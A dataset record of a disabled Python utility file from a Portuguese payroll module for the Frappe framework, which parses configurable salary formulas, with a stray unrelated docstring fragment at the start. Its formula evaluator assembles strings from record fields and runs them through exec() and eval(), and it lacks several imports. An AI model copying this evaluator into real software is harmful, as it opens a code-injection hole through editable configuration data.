~astropy.units.Quantity (float) w : ~numpy.ndarray (float) Create a new MontecarloRunner instance from a Configuration object. Parameters ---------- config : tardis.io.config_reader.Configuration Returns ------- MontecarloRunner
| 1.916362
| 2
|
l10n_pt_hr_salary/utils/utils.py
|
saguas/l10n_pt_hr_salary
| 0
|
6628150
|
<reponame>saguas/l10n_pt_hr_salary
# -*- coding: utf-8 -*-
import frappe
"""
@frappe.whitelist()
def calculate_earnings_description_old(earn_docs):
iliquid = 0
tributavel = 0
earn_docs = json.loads(earn_docs)
earnings_description = frappe._dict({
"tributavel": [],
"totals": [],
})
for doc in earn_docs:
doc = frappe._dict(doc)
e_type = frappe.utils.encode(doc.e_type)
doc_etype = frappe.get_doc("Earning Type", e_type)
incidence_base = frappe.utils.encode(doc_etype.incidence_base)
modified_value = doc.modified_value
iliquid += modified_value
if incidence_base == "Tributável":
precision = 2
tribut_value = get_tributavel_value(doc_etype, doc, precision)
if not tribut_value:
tribut_value = modified_value
earnings_description.tributavel.append({"e_type": e_type, "value": tribut_value})
tributavel += tribut_value
earnings_description.totals.append({"iliquid": iliquid, "tributavel": tributavel})
return earnings_description
def get_tributavel_value_old(doc_type, doc_struct, precision):
tributavel_value = None
tributavel_calcule = doc_type.tributavel_calcule
trib_expr = tributavel_calcule and get_split(tributavel_calcule) or []
is_diary = doc_type.diary_earning_
values = get_values_from_expression(doc_type, doc_struct, trib_expr, is_diary=is_diary)
if values:
tributavel_value = calculate(values, precision)
return tributavel_value
def get_values_from_expression(doc_type, doc_struct, expression_list, is_diary=False):
values = []
has_parents_f = 0
for expr in expression_list:
expr = expr.strip()
print "exprs %s" % expr
if expr.startswith("$(") or expr.startswith("($("):
name = get_regexp_name(expr).strip()
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
if expr.startswith("($"):
values.append("(")
has_parents_f += 1
values.append(val)
if expr.endswith("))") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
elif expr.startswith("$if(") or expr.startswith("($if("):
result = get_regexp_if_expression(expr)
if result:
if result.group(1):
exprss = result.group(1)
i = 0
start_symbol = get_symbol(i)
expression = if_split(exprss, start_symbol)
while not expression:
i += 1
start_symbol = get_symbol(i)
expression = if_split(exprss, start_symbol)
split_value = []
for name in expression:
name = name.strip()
if re.match("^[a-zA-Z]+.*", name):
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
split_value.append(val)
else:
split_value.append(flt(name))
l = len(split_value)
if l == 2 and result.group(2):
res = False
s = "if %s %s %s: res=%s" % (split_value[0], start_symbol, split_value[1], True)
exec(s)
if res:
v = process_expression(result.group(2).split(), doc_type, doc_struct, is_diary=is_diary)
if expr.startswith("($if("):
values.append("(")
has_parents_f += 1
values.extend(v)
if expr.endswith("])") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
elif expr in ("-", "+", "*", "/"):
values.append(expr)
elif expr.endswith(")") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
else:
values.append(expr)
return values
def get_value_from_name(name, doc_etype, doc, is_diary=False):
factor = 1
if name:
name = name.strip()
if name == "valor":
name = "modified_value"
if name == "value_reference" and is_diary:
factor = 31
if doc.get(name):
val = flt(getattr(doc, name, 0))*factor
elif hasattr(doc_etype, name):
val = flt(getattr(doc_etype, name, 0))*factor
else:
val = flt(0)
else:
val = flt(0)
return val
def process_expression(expression, doc_type, doc_struct, is_diary=False):
values = []
for name in expression:
print "name %s" % name
has_parents_f = False
has_parents_b = False
if name.startswith("("):
name = name[1:]
has_parents_f = "("
elif name.endswith(")"):
name = name[:-1]
has_parents_b = ")"
if re.match("^[a-zA-Z]+.*", name):
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
elif name in ("-", "+", "*", "/"):
val = name
else:
val = flt(name)
if has_parents_f:
val = "%s%s" %(has_parents_f, val)
elif has_parents_b:
val = "%s%s" %(val, has_parents_b)
values.append(val)
return values
def if_split(expr, symbol):
result = expr.split(symbol)
if len(result) == 1:
result = []
return result
def calculate(values, precision):
value = "".join(str(x) for x in values)
total = eval(value) or 0
return rounded(total, precision)
def get_regexp_name(content):
pattern = r"\(?\$\((.*?)\)"
result = re.match(pattern, content, re.I | re.S)
return result and result.group(1) or ""
def get_regexp_if_expression(content):
pattern = r"\(?\$if\((.*?)\)(?:\[(.*)\])?"
result = re.match(pattern, content, re.I | re.S)
return result
def get_split(content):
content = prepare_for_split(content)
_if_split = []
content_split = []
in_if = False
for s in content.strip().split():
if s.startswith("$(") or s.startswith("($("):
content_split.append(s)
in_if = False
continue
elif s.startswith("$if(") or s.startswith("($if("):
in_if = True
elif not in_if:
content_split.append(s)
continue
elif (s.endswith("]") or s.endswith("])")) and in_if:
in_if = False
_if_split.append(s)
content_split.append(" ".join(_if_split))
_if_split = []
continue
_if_split.append(s)
return content_split
def prepare_for_split(content):
pattern = r"([*+-/])"
result = re.sub(pattern, " \\1 ", content, flags=re.I | re.S)
return result
def get_symbol(pos):
op = ["=", ">", "<", "!"]
return op[pos]
"""
|
# -*- coding: utf-8 -*-
import frappe
"""
@frappe.whitelist()
def calculate_earnings_description_old(earn_docs):
iliquid = 0
tributavel = 0
earn_docs = json.loads(earn_docs)
earnings_description = frappe._dict({
"tributavel": [],
"totals": [],
})
for doc in earn_docs:
doc = frappe._dict(doc)
e_type = frappe.utils.encode(doc.e_type)
doc_etype = frappe.get_doc("Earning Type", e_type)
incidence_base = frappe.utils.encode(doc_etype.incidence_base)
modified_value = doc.modified_value
iliquid += modified_value
if incidence_base == "Tributável":
precision = 2
tribut_value = get_tributavel_value(doc_etype, doc, precision)
if not tribut_value:
tribut_value = modified_value
earnings_description.tributavel.append({"e_type": e_type, "value": tribut_value})
tributavel += tribut_value
earnings_description.totals.append({"iliquid": iliquid, "tributavel": tributavel})
return earnings_description
def get_tributavel_value_old(doc_type, doc_struct, precision):
tributavel_value = None
tributavel_calcule = doc_type.tributavel_calcule
trib_expr = tributavel_calcule and get_split(tributavel_calcule) or []
is_diary = doc_type.diary_earning_
values = get_values_from_expression(doc_type, doc_struct, trib_expr, is_diary=is_diary)
if values:
tributavel_value = calculate(values, precision)
return tributavel_value
def get_values_from_expression(doc_type, doc_struct, expression_list, is_diary=False):
values = []
has_parents_f = 0
for expr in expression_list:
expr = expr.strip()
print "exprs %s" % expr
if expr.startswith("$(") or expr.startswith("($("):
name = get_regexp_name(expr).strip()
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
if expr.startswith("($"):
values.append("(")
has_parents_f += 1
values.append(val)
if expr.endswith("))") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
elif expr.startswith("$if(") or expr.startswith("($if("):
result = get_regexp_if_expression(expr)
if result:
if result.group(1):
exprss = result.group(1)
i = 0
start_symbol = get_symbol(i)
expression = if_split(exprss, start_symbol)
while not expression:
i += 1
start_symbol = get_symbol(i)
expression = if_split(exprss, start_symbol)
split_value = []
for name in expression:
name = name.strip()
if re.match("^[a-zA-Z]+.*", name):
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
split_value.append(val)
else:
split_value.append(flt(name))
l = len(split_value)
if l == 2 and result.group(2):
res = False
s = "if %s %s %s: res=%s" % (split_value[0], start_symbol, split_value[1], True)
exec(s)
if res:
v = process_expression(result.group(2).split(), doc_type, doc_struct, is_diary=is_diary)
if expr.startswith("($if("):
values.append("(")
has_parents_f += 1
values.extend(v)
if expr.endswith("])") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
elif expr in ("-", "+", "*", "/"):
values.append(expr)
elif expr.endswith(")") and has_parents_f > 0:
values.append(")")
has_parents_f -= 1
else:
values.append(expr)
return values
def get_value_from_name(name, doc_etype, doc, is_diary=False):
factor = 1
if name:
name = name.strip()
if name == "valor":
name = "modified_value"
if name == "value_reference" and is_diary:
factor = 31
if doc.get(name):
val = flt(getattr(doc, name, 0))*factor
elif hasattr(doc_etype, name):
val = flt(getattr(doc_etype, name, 0))*factor
else:
val = flt(0)
else:
val = flt(0)
return val
def process_expression(expression, doc_type, doc_struct, is_diary=False):
values = []
for name in expression:
print "name %s" % name
has_parents_f = False
has_parents_b = False
if name.startswith("("):
name = name[1:]
has_parents_f = "("
elif name.endswith(")"):
name = name[:-1]
has_parents_b = ")"
if re.match("^[a-zA-Z]+.*", name):
val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary)
elif name in ("-", "+", "*", "/"):
val = name
else:
val = flt(name)
if has_parents_f:
val = "%s%s" %(has_parents_f, val)
elif has_parents_b:
val = "%s%s" %(val, has_parents_b)
values.append(val)
return values
def if_split(expr, symbol):
result = expr.split(symbol)
if len(result) == 1:
result = []
return result
def calculate(values, precision):
value = "".join(str(x) for x in values)
total = eval(value) or 0
return rounded(total, precision)
def get_regexp_name(content):
pattern = r"\(?\$\((.*?)\)"
result = re.match(pattern, content, re.I | re.S)
return result and result.group(1) or ""
def get_regexp_if_expression(content):
pattern = r"\(?\$if\((.*?)\)(?:\[(.*)\])?"
result = re.match(pattern, content, re.I | re.S)
return result
def get_split(content):
content = prepare_for_split(content)
_if_split = []
content_split = []
in_if = False
for s in content.strip().split():
if s.startswith("$(") or s.startswith("($("):
content_split.append(s)
in_if = False
continue
elif s.startswith("$if(") or s.startswith("($if("):
in_if = True
elif not in_if:
content_split.append(s)
continue
elif (s.endswith("]") or s.endswith("])")) and in_if:
in_if = False
_if_split.append(s)
content_split.append(" ".join(_if_split))
_if_split = []
continue
_if_split.append(s)
return content_split
def prepare_for_split(content):
pattern = r"([*+-/])"
result = re.sub(pattern, " \\1 ", content, flags=re.I | re.S)
return result
def get_symbol(pos):
op = ["=", ">", "<", "!"]
return op[pos]
"""
|
en
| 0.245938
|
# -*- coding: utf-8 -*- @frappe.whitelist() def calculate_earnings_description_old(earn_docs): iliquid = 0 tributavel = 0 earn_docs = json.loads(earn_docs) earnings_description = frappe._dict({ "tributavel": [], "totals": [], }) for doc in earn_docs: doc = frappe._dict(doc) e_type = frappe.utils.encode(doc.e_type) doc_etype = frappe.get_doc("Earning Type", e_type) incidence_base = frappe.utils.encode(doc_etype.incidence_base) modified_value = doc.modified_value iliquid += modified_value if incidence_base == "Tributável": precision = 2 tribut_value = get_tributavel_value(doc_etype, doc, precision) if not tribut_value: tribut_value = modified_value earnings_description.tributavel.append({"e_type": e_type, "value": tribut_value}) tributavel += tribut_value earnings_description.totals.append({"iliquid": iliquid, "tributavel": tributavel}) return earnings_description def get_tributavel_value_old(doc_type, doc_struct, precision): tributavel_value = None tributavel_calcule = doc_type.tributavel_calcule trib_expr = tributavel_calcule and get_split(tributavel_calcule) or [] is_diary = doc_type.diary_earning_ values = get_values_from_expression(doc_type, doc_struct, trib_expr, is_diary=is_diary) if values: tributavel_value = calculate(values, precision) return tributavel_value def get_values_from_expression(doc_type, doc_struct, expression_list, is_diary=False): values = [] has_parents_f = 0 for expr in expression_list: expr = expr.strip() print "exprs %s" % expr if expr.startswith("$(") or expr.startswith("($("): name = get_regexp_name(expr).strip() val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary) if expr.startswith("($"): values.append("(") has_parents_f += 1 values.append(val) if expr.endswith("))") and has_parents_f > 0: values.append(")") has_parents_f -= 1 elif expr.startswith("$if(") or expr.startswith("($if("): result = get_regexp_if_expression(expr) if result: if result.group(1): exprss = result.group(1) i = 0 start_symbol = get_symbol(i) expression = if_split(exprss, start_symbol) while not expression: i += 1 start_symbol = get_symbol(i) expression = if_split(exprss, start_symbol) split_value = [] for name in expression: name = name.strip() if re.match("^[a-zA-Z]+.*", name): val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary) split_value.append(val) else: split_value.append(flt(name)) l = len(split_value) if l == 2 and result.group(2): res = False s = "if %s %s %s: res=%s" % (split_value[0], start_symbol, split_value[1], True) exec(s) if res: v = process_expression(result.group(2).split(), doc_type, doc_struct, is_diary=is_diary) if expr.startswith("($if("): values.append("(") has_parents_f += 1 values.extend(v) if expr.endswith("])") and has_parents_f > 0: values.append(")") has_parents_f -= 1 elif expr in ("-", "+", "*", "/"): values.append(expr) elif expr.endswith(")") and has_parents_f > 0: values.append(")") has_parents_f -= 1 else: values.append(expr) return values def get_value_from_name(name, doc_etype, doc, is_diary=False): factor = 1 if name: name = name.strip() if name == "valor": name = "modified_value" if name == "value_reference" and is_diary: factor = 31 if doc.get(name): val = flt(getattr(doc, name, 0))*factor elif hasattr(doc_etype, name): val = flt(getattr(doc_etype, name, 0))*factor else: val = flt(0) else: val = flt(0) return val def process_expression(expression, doc_type, doc_struct, is_diary=False): values = [] for name in expression: print "name %s" % name has_parents_f = False has_parents_b = False if name.startswith("("): name = name[1:] has_parents_f = "(" elif name.endswith(")"): name = name[:-1] has_parents_b = ")" if re.match("^[a-zA-Z]+.*", name): val = get_value_from_name(name, doc_type, doc_struct, is_diary=is_diary) elif name in ("-", "+", "*", "/"): val = name else: val = flt(name) if has_parents_f: val = "%s%s" %(has_parents_f, val) elif has_parents_b: val = "%s%s" %(val, has_parents_b) values.append(val) return values def if_split(expr, symbol): result = expr.split(symbol) if len(result) == 1: result = [] return result def calculate(values, precision): value = "".join(str(x) for x in values) total = eval(value) or 0 return rounded(total, precision) def get_regexp_name(content): pattern = r"\(?\$\((.*?)\)" result = re.match(pattern, content, re.I | re.S) return result and result.group(1) or "" def get_regexp_if_expression(content): pattern = r"\(?\$if\((.*?)\)(?:\[(.*)\])?" result = re.match(pattern, content, re.I | re.S) return result def get_split(content): content = prepare_for_split(content) _if_split = [] content_split = [] in_if = False for s in content.strip().split(): if s.startswith("$(") or s.startswith("($("): content_split.append(s) in_if = False continue elif s.startswith("$if(") or s.startswith("($if("): in_if = True elif not in_if: content_split.append(s) continue elif (s.endswith("]") or s.endswith("])")) and in_if: in_if = False _if_split.append(s) content_split.append(" ".join(_if_split)) _if_split = [] continue _if_split.append(s) return content_split def prepare_for_split(content): pattern = r"([*+-/])" result = re.sub(pattern, " \\1 ", content, flags=re.I | re.S) return result def get_symbol(pos): op = ["=", ">", "<", "!"] return op[pos]
| 2.187712
| 2
|